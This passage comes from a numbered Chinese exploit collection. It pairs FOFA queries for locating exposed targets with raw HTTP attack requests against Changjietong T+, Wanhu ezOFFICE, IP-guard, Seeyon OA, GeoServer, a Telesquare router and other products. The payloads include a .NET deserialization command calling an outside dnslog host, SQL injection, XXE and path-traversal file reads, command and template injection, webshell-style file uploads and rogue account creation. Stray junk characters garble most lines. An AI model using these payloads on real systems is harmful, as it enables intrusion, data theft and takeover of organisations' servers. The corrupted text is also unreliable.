POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
P0 A& p" f" t+ q1 y8 `8 K# O6 XHost: x.x.x.x, b# r9 v3 Q9 m+ Z) C4 W- b( l1 k! P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36# r! O9 N5 E( `, V5 _: k, D& X7 |6 f
Content-Type: application/json# Q$ ?, ]0 P$ B
7 Y ] y0 K" {$ a" [! e
{2 s- L2 N$ n. R
"storeID":{
1 o) B( y* d( z5 ~% G' Z "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
c5 C1 h+ \+ ^$ [+ { "MethodName":"Start",
) Z9 x* @: d! t "ObjectInstance":{7 N! R/ |4 k% i9 O/ k! h
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 E; I9 y. Y. P& P2 ~7 J+ q% [ "StartInfo": {0 i/ y! {) E9 n2 a
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 T' P: q6 f- A1 q "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"8 \. ^! L. a# M+ d8 s7 P, e
}8 b, ^$ l& c0 v: q/ E% f
}: h! N. c! g6 Q! z
}, g* d3 n% |& x$ N- [* B! ?" Z
}! ]- d6 q8 V8 j- w
3 p5 e! S& ]4 B3 e2 {
% N8 K. ^4 f3 F5 d3 e+ m. O
57. 畅捷通T+ keyEdit.aspx SQL注入
: r& d# _+ I z3 |. I% S2 k9 ?& EFOFA:app="畅捷通-TPlus"
4 {3 D3 Q. N( N0 O. yGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.17 G: o# F0 L/ |4 r: l& J# i
Host: host/ r W2 A x& g; _) C/ e, h/ I
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
4 q/ M1 c% o$ `/ D( \Accept-Charset: utf-8
, b, Y) s& F2 z& U7 GAccept-Encoding: gzip, deflate7 ^0 }5 L. D6 U/ v# A/ _2 E# k
Connection: close5 U. L2 M0 q4 c+ U! L/ j! }) s
4 m# P' K8 n4 N" ?: q
/ H3 |# \% ~( P! b/ r
58. 畅捷通T+ KeyInfoList.aspx sql注入
: H' k/ K' B: h# e& c( {FOFA:app="畅捷通-TPlus"
7 h% T q+ p! z% Z% aGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1$ ?" T9 v- k# {% R6 O
Host: your-ip0 _8 }* M2 S% \, z$ a
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( d: h# X' S& E( [2 e# e
Accept-Charset: utf-8
# ~8 [1 X; m/ x8 PAccept-Encoding: gzip, deflate
/ N/ r4 g T9 b( N5 U' }5 M% dConnection: close/ C" j4 A( o1 _' t/ l. C
) ?! i3 ?- E9 e; o1 G0 {' K
/ |+ T0 j1 W8 C5 c& N( S59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
% a" y9 U* ]$ u3 ?2 {FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
4 K+ ~* m! E1 W$ M, H- ZPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.19 h7 P! P4 f. }, `1 h3 g1 F0 Q
Host: 192.168.86.128:9090
7 c, z, B1 i" y8 h0 k7 z: F( DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% J% L+ E$ c' x. j# \& p) [9 e) yConnection: close. V, v, `$ b# d5 v9 g
Content-Length: 1669# R5 F% }+ [0 N: E: p) W( F
Accept: */*# u9 J. |* _' v1 U y; l/ y
Accept-Language: en
1 M7 N( H/ S* Z t: P+ L8 eContent-Type: application/x-www-form-urlencoded
6 o- m+ j7 I$ I, }Accept-Encoding: gzip7 W% y% r/ H/ n& y% J
2 `- |8 }8 l, ?$ Z1 [* C3 o J
PAYLOAD
; o* d' N+ J# u* o& `
7 Y3 a$ k+ F+ d1 i6 @( r2 L
1 \3 N. u1 J1 n1 f8 e60. 百卓Smart管理平台 importexport.php SQL注入9 e$ k) w2 ?; F3 c& f9 x, u
FOFA:title="Smart管理平台"
# Q4 l7 U) O8 K5 N oGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1; X8 N: v: U: R) T1 @- x- D' o' v
Host:0 k6 `! x9 f, Q5 {& H" e" @2 E' i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! F6 `5 e$ a3 Q- g, s# [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 E# ]. [! e9 r' G! nAccept-Encoding: gzip, deflate* v% y- m! q" F) \! d
Accept-Language: zh-CN,zh;q=0.91 L( x) a! ]5 M3 V3 Q
Connection: close
! C: @4 h+ e' g" i1 D0 u. ^
; d- H# H l3 j$ ` m/ c
) X- I8 T: d5 m" i% i0 `61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
9 `( Q) o m5 v5 X+ _FOFA: title="欢迎使用浙大恩特客户资源管理系统"# r6 D! r' }0 _0 j" w/ a, B
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
, ^; D7 Y; f/ Q. [- `Host: x.x.x.x
+ @; ~: h! c: i9 J8 c8 z2 e+ Z# f9 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; Z) O6 t( p; n3 I
Connection: close x3 U) s) O' {4 s2 s
Content-Length: 27
. R" }8 c! v+ S8 X# a8 M7 bAccept: */*
- Z( ]" l& w/ eAccept-Encoding: gzip, deflate
4 a! c; V( o; nAccept-Language: en
, m& D& N# w3 T2 u$ h- N- YContent-Type: application/x-www-form-urlencoded
5 V0 z( Z: [" @4 G+ J" y1 D& v/ I
& o' K6 r# ?! u8uxssX66eqrqtKObcVa0kid98xa, d# P7 E: p+ }
) ?, F m6 q- j3 J0 s* E! z5 O; G* `: `
62. IP-guard WebServer 远程命令执行
; q9 b% E- n: W! Q1 ]+ ~% w- p2 _FOFA:"IP-guard" && icon_hash="2030860561"
' ]* H/ k/ U* k+ cGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
" H) ~7 a' Z* s- b8 ]( Z( THost: x.x.x.x4 y8 w1 _4 |5 U* R- g" O# n
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
$ U7 x4 a- \: t3 n; b+ [Connection: close
) Y; L& @9 i- K v' uAccept: */*8 i: w% a" c! J2 |9 o* v1 N/ n# f
Accept-Language: en
9 q h2 A$ Y1 O: XAccept-Encoding: gzip K( g" z, k( w# l2 w7 l" b
3 W2 M4 R# P% ~8 F0 H! h
! Z3 Q7 r4 G7 X: W& W
访问
. [" g2 b# B; A8 H+ D7 u5 \- B+ [+ q* g5 D$ J
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1) p, r7 H# C4 ]* g A c
Host: x.x.x.x9 s% o& p) v: s' D q
. S6 C% |% N* f/ [1 p: t# V: H- g6 |; }$ l `. ~
63. IP-guard WebServer任意文件读取
- @! i( W7 B1 p! j- z9 EIP-guard < 4.82.0609.0
0 g: ^! h8 N3 ^& {* pFOFA:icon_hash="2030860561") S8 }4 u8 n% f0 R) R8 ~% H" `
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
5 u( R. e: ^9 ^+ BHost: your-ip ^5 m5 T- n& s+ J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.363 x* t8 ]6 \: t* ? y+ i- G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: _$ U6 _2 v5 T$ f/ t5 mAccept-Encoding: gzip, deflate
; u; E+ U2 y) t) ?9 |Accept-Language: zh-CN,zh;q=0.9
. T) Z8 T5 p6 u& n. h3 XConnection: close
8 ]/ ~6 s6 f# m7 QContent-Type: application/x-www-form-urlencoded. e: W( z$ D" |, r1 X
6 N% M6 D0 B! U1 |8 ?8 G4 T! [- O
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
6 E0 Y) ^& M% A$ I5 s# Z5 D5 }7 a. g6 L, u' f- u5 `
64. 捷诚管理信息系统CWSFinanceCommon SQL注入- I8 v4 J" ?. d+ b6 j
FOFA:body="/Scripts/EnjoyMsg.js"
; L2 ~2 M3 g) {8 O: l7 OPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
* |7 E/ @8 h% Q% k% DHost: 192.168.86.128:90012 N2 p' G, Q; I) }- h6 V
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36; x, i# ^/ c, a6 d S
Connection: close" @! E6 c* L& H ]( h. v" ?: G
Content-Length: 3699 q' m/ ]- y/ S& a( `7 w0 \9 B
Accept: */*- i9 ~6 A/ F5 F6 s* k
Accept-Language: en
- I* y' Y& \" vContent-Type: text/xml; charset=utf-87 |5 w1 k$ F7 r5 Q9 q- Z8 z5 b6 n
Accept-Encoding: gzip
7 k V) m9 K% c8 L" p
0 B: n; c$ t, L/ d4 z% p* W! D<?xml version="1.0" encoding="utf-8"?>
8 r# `, y1 \, M<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- T/ @1 `. T0 q
<soap:Body>
; B* I( w# l' w, n' _; F% ] <GetOSpById xmlns="http://tempuri.org/">8 G9 ]% [* B2 W/ |( b
<sId>1';waitfor delay '0:0:5'--+</sId>
$ O* S8 s5 w, @4 P! z </GetOSpById>
0 j5 `5 x" E: D8 ^1 \ </soap:Body>
% i3 l# X$ u- c. M4 d</soap:Envelope>
! V5 u; u0 a$ V8 m+ E T/ D5 H- V) i, @4 E
4 j* d. U0 m6 B5 p) [ [( t
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
( X7 C, F) N1 ?( @FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"% s4 x$ v$ V6 J
响应200即成功创建账号test123456/123456: ~) u: `2 ^! h0 T4 ?9 E* U
POST /SystemMng.ashx HTTP/1.1( `0 N% }, n: G9 z
Host:
+ c9 x6 T! `, b$ N- MUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2 ?; Q5 V5 T" s( l1 h, m3 IAccept-Encoding: gzip, deflate
/ V7 h) g1 i5 n; Z* T( qAccept: */*' F+ @- m8 F0 q5 d; c
Connection: close. u& |1 W% k7 f# b5 s; C5 K
Accept-Language: en: j% U! f9 _, j: U4 p- F8 i
Content-Length: 174) W5 B' R% V9 E6 r b
, x* M0 D: \8 ?- i, Y5 u' W( KoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators8 g) }" r4 M3 ]9 i6 Z5 z0 Q
0 V& V9 Q7 w9 K* l& a/ |8 V
. D5 K, }4 ^! p
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
3 J2 v: w* W' o0 x5 W2 z) }+ RFOFA:app="万户ezOFFICE协同管理平台"
, G6 q. i5 f6 O9 W c, t& d1 x/ X$ Z0 k5 S# N) Y+ p
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
1 v9 _5 u; s5 U/ V6 `Host: x.x.x.x
5 y0 t/ z* M: LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" i; p' d& O l+ K$ G
Connection: close
* O: l( y; [( t! xAccept: */*
: i2 P% _$ Q0 Q3 o% r8 q/ ~. C% YAccept-Language: en
- O- ^$ l6 z0 f9 j, EAccept-Encoding: gzip
; R; p, `( A" W0 ?) X7 E6 ^9 T7 r+ e; T# A+ A
5 U1 Q a: h1 ?: n d9 n; E
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在: \' g8 i1 ~5 s3 W; R
8 r& G' y) H' A* o! z67. 万户ezOFFICE wpsservlet任意文件上传. D+ L1 J# @! ], Z/ T* V7 k, e
FOFA:app="万户网络-ezOFFICE"
+ w1 f. F7 g* [9 ^& K$ |newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
. f% r+ s6 d0 A# @' D1 _$ \POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1& X4 s+ Q! C2 f" J- W0 G
Host: x.x.x.x
6 _8 ~2 q2 K3 P0 {! q" k. IUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
4 }+ ^- M7 C* d1 |! N3 aContent-Length: 173
8 t3 T; O0 z) q- J; ]* eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
U* p% z& T* @* @Accept-Encoding: gzip, deflate
6 x8 q5 i# B! Q0 @1 x' m y! cAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
2 I) Q, x8 \9 G3 A T+ dConnection: close% ?- P7 S8 _, x/ F1 { [
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp! J# S# N# ?2 _# c! O, |- q
DNT: 12 e# @: X$ I m) u$ {
Upgrade-Insecure-Requests: 1
8 X' ?: c: A# F+ c
) D2 ?6 N7 s' C2 P--ufuadpxathqvxfqnuyuqaozvseiueerp
. K3 B) c' j, R7 i- WContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"" ~" [1 g y) g* J" g8 |1 {
/ L' l( o# J c0 b0 c& |8 q<% out.print("sasdfghjkj");%>
6 T( \0 X0 m5 v6 Y--ufuadpxathqvxfqnuyuqaozvseiueerp--
: i! I, e- Q0 ~! u
# E- |8 b% j+ t% o7 C ^) E2 N+ q! A. W: c5 { N" r6 F
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
5 w# E4 Q) q% G/ d6 _5 V3 }! N( c; n, O0 H. E( ^
68. 万户ezOFFICE wf_printnum.jsp SQL注入
2 f9 H% f1 ^; c5 D# k+ G- P! XFOFA:app="万户ezOFFICE协同管理平台"- c3 s N3 |' B: ]$ x+ z
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1+ K) s, m, ~. y+ Y( _9 ]$ t( F- j2 P
Host: {{host}}# T7 t7 O3 P* ^6 n3 ^, r1 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36$ p: _! B% p/ Z# ^* d
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
5 R# O; K: y* ]( k$ _Accept-Encoding: gzip, deflate: W1 l+ b) G5 r8 _# @6 R
Accept-Language: zh-CN,zh;q=0.99 B* F: I2 `& @' H6 d. t `4 d
Connection: close% }! P/ ?4 S; G6 C) @
2 u+ N- Y; t7 H/ Y$ e; f$ E4 c) {' z2 e7 k
69. 万户 ezOFFICE contract_gd.jsp SQL注入0 I, B) ?# |' Y& O
FOFA:app="万户ezOFFICE协同管理平台"6 k; E0 L( s g( p0 Y
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
9 y+ q# `5 p! k/ A7 _Host: your-ip: S& P# {' ?& u
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% K" Q, T3 r5 |* _3 d' j& _
Accept-Encoding: gzip, deflate! v+ K/ o8 \+ o/ Q2 L7 `! @) M, M
Accept: */*
0 S2 `# n$ ]- @; F% b$ uConnection: keep-alive
( I: Z' T. I2 l$ u! U/ @4 ^2 V3 |8 k. k& F C/ L
3 Z) l" U# E& e5 r9 r" M70. 万户ezEIP success 命令执行$ e6 z' d! C `1 R9 ?% `, {# H. [
FOFA:app="万户网络-ezEIP"
% H5 H. l6 Y( R6 f6 z" \POST /member/success.aspx HTTP/1.1
4 a& [# J6 S) T7 w# f/ S' ^Host: {{Hostname}}
: p+ D8 `) Q( a: L4 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ p2 y8 ` u$ r3 nSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
5 G( M, F7 c+ ^4 N/ UContent-Type: application/x-www-form-urlencoded$ e5 |+ G9 z' G1 v" _
TYPE: C
2 y( x# E$ u* ^! QContent-Length: 167027 a: R- v& X" T& L5 z7 n% s2 N
! i& W+ n% f% d2 Z__VIEWSTATE=PAYLOAD
/ D- }* v6 {) i) ^0 _
: H: { I, r( M* t7 m: B; F N# R5 L3 T
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
# O5 E. ~/ I) E) [" L0 Q5 B, `FOFA:body="PM2项目管理系统BS版增强工具.zip"
3 Z, _4 ]7 k9 S" l" K( d3 |' OGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1, v9 n9 G0 u9 R0 w1 T$ B7 m
Host: x.x.x.xx.x.x.x
% q/ @1 O' L! ]2 DUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36- X: k% G4 F8 z2 F8 `
Connection: close7 O6 }( @* f0 Y h( l- b& A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' A3 P% K! P+ q8 q& Z6 n
Accept-Encoding: gzip, deflate
3 J' b- E, t$ @* o: \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, e+ T1 {7 `' K1 H! P/ F) XUpgrade-Insecure-Requests: 1! l/ K( b, F. c0 D, o
9 \; I* W# W7 N
6 A+ J+ d8 o; ~8 m4 x6 F72. 致远OA getAjaxDataServlet XXE
5 h" P8 {) H( s% v) k8 X: W: }1 g7 KFOFA:app="致远互联-OA"
9 @$ _7 t, Y, [ _POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1$ @7 ~/ E( u8 Z6 ?# `
Host: 192.168.40.131:8099! N& z% r1 P% d& m/ R; ]
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36- [$ f0 p" i) f5 _4 n
Connection: close
- y0 @. ^" {$ B! n1 a$ C# C+ H: g- ^Content-Length: 583: O- S" U: V& j; T( Y# P
Content-Type: application/x-www-form-urlencoded
# Z1 \7 H' r! i; ~+ G5 rAccept-Encoding: gzip8 @# P1 s6 C) i2 L4 S7 P
8 o6 u1 n* ?5 z4 i% p1 b7 JS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E' i' S }- }7 k4 B% k8 H3 e8 k
# f/ D* x! M3 k6 ~
6 |: y5 g8 P7 D/ @, y8 R! o
73. GeoServer wms远程代码执行
2 `6 b0 [3 M! k, b2 g- ZFOFA:icon_hash=”97540678”! P" j$ q% R- ?+ Z2 d' T
POST /geoserver/wms HTTP/1.1
: `9 `# u9 e/ MHost:
" Y5 t4 j3 a5 f4 ?6 I: aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.362 f8 H% `( Y7 m5 S; |+ `% u
Content-Length: 1981
! v+ Q4 S( `+ yAccept-Encoding: gzip, deflate" p% j9 \7 L. \8 h% z
Connection: close
0 Y. {: P$ _! l- C! I6 j' D8 O& H6 pContent-Type: application/xml
3 O- j+ G2 Z( W) {SL-CE-SUID: 3
# K- [2 Z4 E& f P& d; j4 N7 G) ~1 L5 l" H% g8 p1 u. i6 q
PAYLOAD2 O! R% k1 f# ^7 Y0 _
, q6 A3 B. J# e( }5 U/ o
3 D* K% |- Y+ t, B74. 致远M3-server 6_1sp1 反序列化RCE* E7 e) u; a: E/ a
FOFA:title="M3-Server"
2 R# D# n B: i1 ]7 u; R, l0 NPAYLOAD
$ A9 L$ R" C: d, K6 J
( @# o3 ?: V9 k: }75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
9 i6 o W/ f$ M, }* P$ ?' [FOFA:app="TELESQUARE-TLR-2005KSH"0 J& M6 w" {* q& I9 \7 M! d' N6 v; ^
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
- |8 S% ~. Q3 I* X q g& WHost: x.x.x.x
: I6 _ S ?8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 L+ U' O# O& b/ n: G: E8 k$ F8 s
Connection: close
6 `: m; j7 [5 y* d; a* @Accept: */*# f2 y% U+ n1 t) q8 r5 f0 p$ x* F
Accept-Language: en6 {! T& V+ J+ x+ S
Accept-Encoding: gzip
8 u) H9 p% ^ m) Y% Q2 u: L7 F) O2 c4 l2 ~& {: o- N
, Y* u) \- k9 c; W* S; V. i; J' RGET /cgi-bin/test28256.txt HTTP/1.1
) R, R1 K' U9 C: x& K- MHost: x.x.x.x( L8 P# O$ Z& H1 U9 V
& [7 W8 r& {2 O+ l& H* p5 j
$ D* J! N! G% Z2 u+ [; B76. 新开普掌上校园服务管理平台service.action远程命令执行
! s+ C4 K' @( f. eFOFA:title="掌上校园服务管理平台": ~8 r6 N$ A' R: ^# s
POST /service_transport/service.action HTTP/1.1( B8 }, @- o3 t6 A7 j% N
Host: x.x.x.x% `% Y) N3 _- w r+ j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+ Q) ?5 `* m% s2 |: }Connection: close5 `0 F$ ?" G- m" C
Content-Length: 2118 B1 Q( E' F9 Z) \+ ~, h: K. V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: W* F8 D3 c1 C7 GAccept-Encoding: gzip, deflate
5 C7 B( r$ D0 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ c. z/ n. N4 D* V
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4! N. b9 t2 B J- B. r# y
Upgrade-Insecure-Requests: 1
: |5 B5 s9 F# A) j- y; B# G
# b' @% n# q9 y9 g+ m/ o, A{
+ [: l8 n) l0 _"command": "GetFZinfo",
6 N" d8 ?0 W' c( O7 a2 W0 N "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 i, K0 {3 i- Z1 P, |6 a; N ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"( G. n! w& f9 h- D6 Z, j
}7 G, D$ I! L( N* e" Y. r
9 R6 q1 S/ T+ X' x- L
2 [& K& s6 l. u+ n% z( mGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.17 I6 A5 n* J5 `3 G( f, Q
Host: x.x.x.x& U! g# X# q& r# w: v5 j7 W" ]3 u- Y
# D* i, k; i5 I0 a8 h
4 e. Z: J3 X- D9 m8 y) }7 p! W
. q1 z7 d7 `" B$ \0 e: a7 B3 D- o77. F22服装管理软件系统UploadHandler.ashx任意文件上传
: B7 V; B$ t. ~FOFA:body="F22WEB登陆"! z4 E A. r0 a4 r; \3 E7 m
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1: _3 U) t. k5 ]
Host: x.x.x.x
8 Q# r5 G4 v5 {9 |+ ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 Y9 j* `' b% b8 ]Connection: close7 n2 U$ P+ R- T6 Q
Content-Length: 433
$ N1 P8 H# o3 G, kAccept: */*" r4 H, r) D5 N
Accept-Encoding: gzip, deflate* G( H. H# Y& R# @4 w0 H, ~
Accept-Language: zh-CN,zh;q=0.9# d' w7 g& c& Q% |; H
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix* U- k0 J! Z. B' [
1 f! O* z( F7 o z R
------------398jnjVTTlDVXHlE7yYnfwBoix$ C7 i2 Z+ ^6 d; w
Content-Disposition: form-data; name="folder", u' p2 `0 u Q9 U
8 @; ^0 N& W/ s, u/ G2 P/upload/udplog
7 K% E& a! {! E6 [/ a5 C------------398jnjVTTlDVXHlE7yYnfwBoix- y) X( K: c* B/ r2 j0 U1 `
Content-Disposition: form-data; name="Filedata"; filename="1.aspx", k, V4 K0 _ d5 J+ G
Content-Type: application/octet-stream8 ^; e7 N; u" \
# m* Z5 ?! B x1 @
hello12345672 O- p) T* H) r2 `2 i/ H
------------398jnjVTTlDVXHlE7yYnfwBoix7 |; N& @* M( e/ J
Content-Disposition: form-data; name="Upload"
. K7 }$ c2 R' @$ ?; |. [
8 j8 A3 I+ n8 A. dSubmit Query
2 M+ P- z+ x/ \5 _% g9 i------------398jnjVTTlDVXHlE7yYnfwBoix--
9 U9 n2 o, J9 Y% n" ^' O+ C; ^2 D/ D& J, z
; e$ ^" [. P8 e k6 I
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传 Y5 c8 ^: c' [7 g
FOFA:icon_hash="2001627082"9 D7 p9 t4 d) V' m
POST /Platform/System/FileUpload.ashx HTTP/1.18 f" p$ G/ U6 W/ y
Host: x.x.x.x2 R& j# O, e6 D5 G8 Q7 |4 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 B$ x: p( ]5 V* @" s( k- s
Connection: close
0 u/ S$ ~/ B8 T3 b. i* D" D5 zContent-Length: 336; r" c: T+ J- L7 c! W
Accept-Encoding: gzip% t, l( T# U& p8 m6 m* Z
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l6 U6 X4 }3 U# S4 j+ W
2 Y0 X4 M5 n/ ~------YsOxWxSvj1KyZow1PTsh98fdu6l: `' S: U1 o- I% e" P: W+ a
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"& O9 J3 f5 I' ^
Content-Type: image/png
7 p# J6 d9 X( P5 l9 W" Z( I8 ?& ^7 Z
YsOxWxSvj1KyZow1PTsh98fdu6l9 N" z. a. j) n8 j9 o' _: ]
